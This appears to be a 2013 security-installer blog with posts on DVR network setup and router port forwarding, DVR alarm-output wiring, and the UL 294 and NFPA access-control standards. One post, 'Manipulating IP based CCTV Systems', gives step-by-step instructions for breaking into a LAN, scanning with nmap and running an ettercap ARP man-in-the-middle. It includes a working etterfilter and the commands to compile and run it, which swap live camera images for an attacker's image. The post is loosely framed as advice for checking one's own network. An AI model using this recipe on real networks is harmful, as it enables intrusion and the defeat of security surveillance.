Saturday, August 3, 2013

Port Forwarding using a Linksys Router - Configuring the DVR

Configuring the DVR to pick up an IP address
1. Right Click and select Main Menu 
2. Select  Setting
3. Select Network
4. Check the box next to DHCP and click Save
5.  Select Shutdown
 6.  Set to Restart system and click OK

 7. Right Click and select Main Menu (Now we are Identifying the IP address) Then Select Settings, Then Select Network.




 8. Uncheck the box next to DHCP, write down the IP Address, Subnet Mask, and Gateway, and click Save


To setup port forwarding on this router your computer needs to have a static ip address.
Or you can take alook at our Static IP Address guide to setup a static ip address. When you are finished setting up a static ip address, please come back to this page and enter the ip address you setup in the Static IP Address box below.




Open a web browser like Internet Explorer or Firefox. Enter the internal IP address of your router in the address bar of your browser.

In the picture above the address bar has http://www.google.com in it. Just replace all of that with the internal IP address of your router. By default the IP address should be set to 192.168.1.1. 
You should see a box prompting you for your username and password. Enter your username and password now. By default the username is admin, and the password is admin. Click the Ok button to log in to your router.



Click the Applications & Gaming link near the top of the page. 
You should now see a new menu. In this new menu, click Port Range Forwarding.




We will list a series of lines here that will show you exactly how to forward the ports you need to forward. Some DVR requires you to forward the following ports: 80,37777,37778. Go ahead and enter the settings shown above into the Port Range Forwarding menu. 




When you're finished, click Save Settings near the bottom of the screen to save your changes
 
And that's it! You're done!

Wednesday, July 31, 2013

DVR Alarm Output Application

Maximum Time I wrote for Sales/ Marketing / Commercial professional, but this post dedicated to Technical services Technician / Engineers. Many engineers say's How to Connect DVR Alarm output with Power Source/ whats the application etc etc.

A DVR (Digital Video Recorder) alarm output application refers to the use of the alarm output capabilities of a DVR system to trigger external actions or notifications in response to certain events or conditions detected by the DVR. These applications enhance the functionality and usefulness of DVR systems in various security and surveillance scenarios. Here are some common uses of DVR alarm output applications:
  1. Intrusion Detection: When a DVR detects motion or unauthorized entry in a secured area via connected surveillance cameras, it can trigger alarm outputs. These outputs can activate external alarms such as sirens, strobe lights, or even notify security personnel or authorities.

    Door Access Control: Some DVR systems are integrated with access control systems. When someone presents a valid access card or enters a PIN code, the DVR can send a signal to unlock a door or gate, granting access to an authorized individual.

    Smoke and Fire Detection: In situations where a DVR is part of a broader security and safety system, it can be connected to smoke detectors and fire alarms. When smoke or fire is detected, the DVR can trigger alarms, initiate evacuation procedures, and record video footage for investigative purposes.

    Perimeter Protection: For properties with fences or boundaries, outdoor surveillance cameras connected to a DVR can monitor the perimeter. If an intruder breaches the perimeter, the DVR can activate alarms or external lighting to deter the intruder.

    Temperature and Environmental Alerts: In some cases, DVR systems can monitor environmental conditions such as temperature or humidity. If conditions exceed predetermined thresholds (e.g., in server rooms or storage facilities), the DVR can send alerts or trigger alarms to prevent equipment damage.

    Emergency Notifications: DVR alarm outputs can be configured to send notifications to designated individuals or emergency response teams in case of critical events, ensuring a rapid response to security incidents.

    Integration with Other Systems: DVRs often support integration with other security and automation systems, including intrusion detection systems, access control systems, and building management systems. This integration allows for comprehensive security and automation applications.

    Remote Monitoring and Control: Many modern DVR systems allow for remote monitoring and control via mobile apps or web interfaces. Users can receive real-time alerts and take action (e.g., activate alarms or unlock doors) remotely.

    Customized Event Triggers: DVRs often offer programmable event triggers and outputs, allowing users to define specific conditions that lead to alarm activation. This customization caters to the unique security needs of different environments.


  2. Evidence Preservation: When an alarm is triggered, the DVR can automatically start recording video footage and save it to a secure location. This ensures that critical evidence is preserved for investigative and legal purposes.

The alarm output ports on the back of the DVR are each labeled with NO C NC. The NO stands for normally opened, NC means normally closed, and C means common contact. When the alarm is in the non-triggered state, it is normally closed which means that the circuit is allowing current to flow from C to NC. When the alarm is triggered, the relay is enabled and switched from the normally closed (NC) to normally opened (NO) position.

The security application used in these instructions uses a 12v DC powered strobe light. The goal is to turn the strobe light on when an alarm is triggered. For this application, we will use a door contact connected to the alarm input of the DVR to trigger the output. 

Please note that the DC transformer used to power the strobe light / siren is only used to power the siren and has nothing to do with the power supply of the DVR. The concept is that the strobe light sits dormant / un-powered (relay in the NC position) until the alarm goes off. When the alarm goes off, the relay is enabled and allows power to flow to the strobe light (via switching the power of the circuit to the NO position), which turns it on.

WARNING: DVR alarm outputs / relays have a maximum power rating. The alarm outputs of DVRs have a maximum power rating of 2A 120VAC, 2A 24VDC. This rating should accommodate almost all standard burglar alarm equipment, but you should check the specification of each device to be sure. 

If you are using these setup instructions to guide you on integrating alarm devices on other types of surveillance DVRs is strongly recommended that you consult the manual of your DVR to understand the maximum power that your DVR alarm outputs can use. Using an alarm device that draws more power than the relays of your DVR are rated at will cause damage to the relay terminals and / or can ruin the entire DVR.

DVR Alarm Output Wiring

The siren in this example uses a 12v DC power supply. These typically have a single 3.5mm plug on the end of the cable. If your DC transformer has a single plug (instead of separate positive and negative wires), you can use a PT-4 pigtail power lead to convert the plug to separate positive and negative wires.
  1. Connect the positive wire from the power supply to the NO terminal of the alarm-out port.
  2. Connect the negative wire from the power supply to the negative cable of your output device (in this case a strobe light).
  3.  Connect the positive wire from the strobe light to the C terminal of the alarm-out port.

DVR Alarm Output Configuration

In this example, we will use the input from a door sensor to trigger the alarm output (with strobe light connected to it). Please read these setup instructions for details about how the alarm input was configured for the door sensor.
Follows these instructions to configure the door sensor to trigger the alarm output.
1. Access the advanced setup of the DVR the clicking on the Home button, then select Setup > Advanced.

2. On the Advanced menu, click on the the Event tab, then click on the Sensor button.
3. On the sensor screen, you can can choose the action(s) that you want taken. To setup the strobe light on alarm output one to be triggered, click on the gear icon in the alarm section of the sensor action settings. This will open a sub-window that will let you choose to enable all alarm outputs or select the specific ones that you want triggered.
4. Click OK, then OK again to save the settings.
The alarm output of your DVR is now setup. When the door contact is opened, the strobe light will turn on.

It's important to configure and use DVR alarm output applications carefully to prevent false alarms and ensure that they are aligned with the security objectives of the organization or property. Proper integration, testing, and maintenance of the DVR system are essential to its effective operation in various security and surveillance scenarios.

Friday, July 26, 2013

Manipulating IP based CCTV Systems

Manipulating IP based CCTV Systems.
As you are probably aware, CCTV networks provide security to businesses around the world. However due to unsecure networks and poorly designed networks, network security cameras can be abused and there video streams redirected or modified. I am going to explain how this can be done, so you can check your network.

1. Connect to the network using wireless or penetrate a machine on lan.
2. Upload nmap and ettercap onto your machine or the machine on lan that you penetrated.
3. Scan the internal network using nmap and look for open ports in this example we will look for cameras.
4. once you find a camera run ettercap and scan the machines and perform mitm.
5. Watch the traffic and look for the ip of the cameras by sniffing the traffic coming through your machine.
6. Look at the tcp.dst and tcp.src of the packets this will tell you the source and destnation packets.
7. Once you find a suitable camera and the client that is watching create an etterfilter, One is provided below

#Example etterfilter
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, “Accept-Encoding”)) {
replace(“Accept-Encoding”, “Accept-Rubbish!”);
# note: replacement string is same length as original string
msg(“zapped Accept-Encoding!\n”);
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace(“img src=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
replace(“IMG SRC=”CAMERA PICURE URL HERE”, “img src=”YOUR IMAGE HERE WITH URL HERE” “);
msg(“Filter Ran.\n”);
}

8. Save the file as a filter for example camera.filter
9. Compile that source using ‘etterfilter camera.filter -o camera.ef’
10. Now setup ettercap to use the filter each time the page is viewed across the network ‘ettercap -T -q -F camera.ef -M ARP // //’
11. Now in theory each time the camera is viewed by someone on the network they will see your camera image not the stream.

This attack has been used, and can be devastating to any business that depends on network cameras for security. Some businesses connect network cameras directly to the gateway router, if the gateway is penetrated then this places the cameras at risk.

Wireless networks also can provide attackers with a direct connection to your network once the encryption has been broken. Wireless networks with weak encryption and a lack of network monitoring can aid an attacker in becoming undetected on the network.

I recommend that you install either a hardware firewall that detects spoofing attacks inbetween the network cameras and router/switch, and use network encryption, this should provide a very difficult environment for an attacker.

Sunday, July 14, 2013

Access Control Standards Revolution Now In Progress

Access Control Standards Revolution Now In Progress 



Access control provides the ability to control, monitor and restrict the movement of people, assets or vehicles, in, out and round a building.

Access control is essential for all businesses to protect people and assets and has the added benefit of being expanded from controlling, for example, a single entrance door, to a large integrated security network. There are also huge potentials in terms of integrating other systems, such as Time and Attendance, Visitor Management, ANPR, Fire, Intruder and CCTV.

Few specifications are seen more commonly in access control than UL 294. However, aside from seeing it in print, very few understand what it means. In this note, we break apart and define this spec, describing why it is a vital part of many Access RFPs.


A Standard Defined
The scope of UL 294 covers three aspects of Access Control systems: 
  • Construction (Installation)
  • Performance
  • Operation
Essentially, the heart of UL 294 is a safety standard, where testing proves that system components can be assembled and operate reliably without hazard. In the case of access control, this is a step beyond just validating devices will not catch fire or spark - it attests that the system will not harm the safety or impede egress of those using the system.
In practical terms, this means doors will not accidentally stay locked and keep people in harm's way even during a malfunction. The UL standard subjects each labeled device to a range of testing designed to show the equipment meet relevant code expectations from:
  • NEC (NFPA 99): Requirements that each component will not create a hazard either during (recommended) install or use (Sparking, Grounding)
  • NFPA 72: Fire Code compliance, assures that controllers include interfaces with fire alarm/suppression systems 
  • NFPA 101: System devices 

A UL 294 mark is a 'extra step' the vendor has taken to 'prove' their equipment is safe, and it stands as a 'mark of assurance' when included in buying specifications that dubious equipment will not be purchased.

The Mark

While Underwriter's Laboratories offer a range of 'UL Symbols' that can be interpreted to signify different standards. In the case of UL 294, the mark looks like this:
The UL 'Security Mark' applies only to products such as intrusion detectors, burglar alarms, access control, safes, and vaults.

Performance Tests
UL 294 includes several tests that evaluate how well devices withstand damaging environments. Devices are subjected to atypical electrical, environmental, and brute force situations, including:
  • Variable Voltage
  • Variable Ambients (Environment)
  • Humidity
  • Endurance (Ruggedness)
  • Transients
  • Corrosion
  • Standby Power (Battery backup)
  • Physical Attack Toughness
Tests are performed individually and are not 'layered' or 'stacked' simultaneously as might occur in the field. The exact methodology for each test depends on the device being tested, but the resulting grade is given in four levels of security performance with Level I (lowest level security equipment) to Level IV (highest level security equipment). 

Exclusions
However, not all parts and features of an Access platform fall under the scope of UL 294. Two areas excluded from the scope include:
  • Headend Server/Database: The scope reads "The accuracy of logged data is not evaluated by this standard", and also "This standard does not apply to supplementary computer equipment that is not necessary for operation of the access control system..."
  • Intrusion Detection: Again, the scope details "Where an access control equipment and/or system incorporates the features and functions of a burglar alarm control unit, the requirements of the Standard for Proprietary Burglar Alarm Units and Systems, UL 1076, shall also apply"
This is important to note when careless specs are written that "All Access Equipment shall be UL 294 Certified", because this is inherently not possible. There will be major functional aspects outside the scope of the standard.

Large System Adoption
Especially for larger systems, UL 294 is common, including devices from: Mercury Security, C*Cure, S2, Maxxess, Sargent, etc.
However, certification is done on a component basis, and there may be gaps in a brand's portfolio. If UL 294 compliance is required in a system, every hardware component must be checked for conformity, as there is no 'system' certification.
Systems and platform intended for smaller deployments (<100 doors) typically forego the certification, because it simply is not a purchasing driver for many non-enterprise customers.

Prime Use
Regardless of the 'safety' overtures, like UL certification for surveillance equipment, 294 is primarily used to exclude non-compliant systems from specifications. UL 294 evaluation is not mandatory for Access Equipment, and many vendors forego the cost of certification especially when their offerings are not well suited for larger government, institutional, and hospital verticals where 294 is commonly cited. 
Likewise, while the mark's testing 'proves' that devices are safe, the onus remains on the field technician to install them in the correct fashion to indeed live up to the certification.

Remember once UL certification has void OEM is not responsible for any health & safety incident of your premises. UL certification void due to repairing through unauthorized service provider....etc.

NFPA 101
While NFPA 101 is comprehensive, the most relevant passages for access control include:
  • NFPA 101: 'Electrically Controlled Egress Doors' (2012: 7.2.1.5.6; 2009: 7.2.1.5.5)
  • NFPA 101: 'Releasing Devices' ( 2012: 7.2.1.5.10-12; 2009, 2006, 2003: 7.2.1.5.9 -7.2.1.5.11)
  • NFPA 101: 'Access Controlled Egress Doors' (7.2.1.6.2)
Specifically, requirements like Access Control Request to Exit (RTE), Exit Devices, and Delayed Egress foundationally conform to NFPA 101.

NFPA 72
In general, this code is the foundation of requirements that doors must release when fire alarms or smoke detectors go into alarm.

NFPA 80
Specifically, this code examines Fire Doors and how they are properly used for protection in a building. In many cases, these door types are also slated to become access-controlled openings, and the 'Locks or Latches (6.4.4)' section describes which modifications are permitted for access use without voiding their fire door ratings.

IBC: International Building Code
The IBC, published by the International Code Council, is essentially a guidebook for designing and engineering safe buildings.

If not observed directly as the authority, then whatever resulting codes that do have authority take guidance from the source.
  • ·     IBC: 'Door Operations' (2012, 2009: 1008.1.9; 2006, 2003: 1008.1.8)
  • ·       IBC: 'Sensor Release of Electrically Locked Egress Doors' (2012: 1008.1.9.8; 2009: 1008.1.4.4; 2006, 2003: 1008.1.3.4)
  • ·       IBC: 'Electromagnetically Locked Egress Doors' (2012: 1008.1.9.9; 2009: 1008.1.9.8)